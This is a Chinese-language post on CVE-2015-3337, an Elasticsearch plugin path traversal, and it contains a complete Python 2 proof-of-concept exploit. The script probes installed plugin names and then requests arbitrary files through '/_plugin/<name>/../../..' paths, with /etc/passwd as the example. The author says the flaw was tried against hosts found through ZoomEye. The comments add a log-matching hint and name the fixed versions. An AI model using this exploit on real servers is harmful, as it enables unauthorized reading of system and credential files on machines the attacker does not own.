近期在exploit-db上曝出了ElasticSearch插件功能的目錄遍歷(Path Traversal)引起的本地任意文件讀取漏洞,影響1.4.5和1.5.2之前所有版本。在zoomeye上隨便找了幾個試了下,發現漏洞的影響面積還挺大的。
漏洞利用(POC)
#!/usr/bin/python
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/
#
# Source: https://github.com/pandujar/elasticpwn/
#
# NOTE(review): Python 2 syntax throughout (print statement, `<>`,
# `except Exception, e`); it does not run unmodified under Python 3.
# The mitigation for the issue it demonstrates is the upgrade to the
# fixed releases named above (1.4.5 / 1.5.2) or later.

import socket, sys

print "!dSR ElasticPwn - for CVE-2015-3337\n"
# Usage: <script> <host> <absolute file path>; anything else prints the
# example line and exits.
if len(sys.argv) <> 3:
        print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
        sys.exit()

port = 9200 # Default ES http port
host = sys.argv[1]   # hostname/IP, used verbatim for connect() and the Host header
fpath = sys.argv[2]  # path that is appended directly after the traversal sequence

def grab(plugin):
        """Request fpath through the plugin path traversal and print the raw reply.

        Sends one hand-built HTTP/1.0 GET whose request line is
        /_plugin/<plugin>/../../../../../..<fpath>. From a defender's side, a
        "/_plugin/<name>/../.." sequence in the request line is the thing to
        match in access logs or at a reverse proxy when looking for attempts
        against this issue. Only the first 2048 bytes of the reply are read,
        and "success" is decided by a substring match on the status line; any
        reply without a 200 status line lands in the else branch (the message
        there lists the usual causes). The socket is never closed explicitly.
        Reads the module globals host, port and fpath.
        """
        socket.setdefaulttimeout(3)   # 3 s applies to connect() and recv() below
        s = socket.socket()
        s.connect((host,port))
        s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
            "Host: %s\n\n" % (plugin, fpath, host))
        file = s.recv(2048)   # shadows the builtin `file`; holds the raw response bytes
        print " [*] Trying to retrieve %s:" % fpath
        if ("HTTP/1.0 200 OK" in file):
            print "\n%s" % file
        else:
            print "[-] File Not Found, No Access Rights or System Not Vulnerable"

def pfind(plugin):
    """Check whether /_plugin/<plugin>/ answers 200; if so call grab() and exit.

    Reads only 16 bytes of the reply, which is enough to see the status line,
    and treats any "HTTP/1.0 200 OK" as "plugin is installed". Every error
    raised while connecting or sending (e.g. a refused connection or the
    3-second timeout) is caught as a generic Exception, printed, and ends the
    whole program, so a single unreachable host stops the scan of the
    remaining plugin names. The sys.exit() after grab() raises SystemExit,
    which is not an Exception subclass, so it propagates past the handler.
    Reads the module globals host and port.
    """
    try:
        socket.setdefaulttimeout(3)
        s = socket.socket()
        s.connect((host,port))
        s.send("GET /_plugin/%s/ HTTP/1.0\n"
            "Host: %s\n\n" % (plugin, host))
        file = s.recv(16)   # just the start of the status line; shadows builtin `file`
        print "[*] Trying to find plugin %s:" % plugin
        if ("HTTP/1.0 200 OK" in file):
            print "[+] Plugin found!"
            grab(plugin)
            sys.exit()   # first installed plugin wins; nothing after it is probed
        else:
            print "[-]  Not Found "
    except Exception, e:
        print "[-] Error connecting to %s: %s" % (host, e)
        sys.exit()

# Include more plugin names to check if they are installed
# Names are probed in list order; pfind() exits the script on the first 200.
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']

for plugin in pluginList:
    pfind(plugin)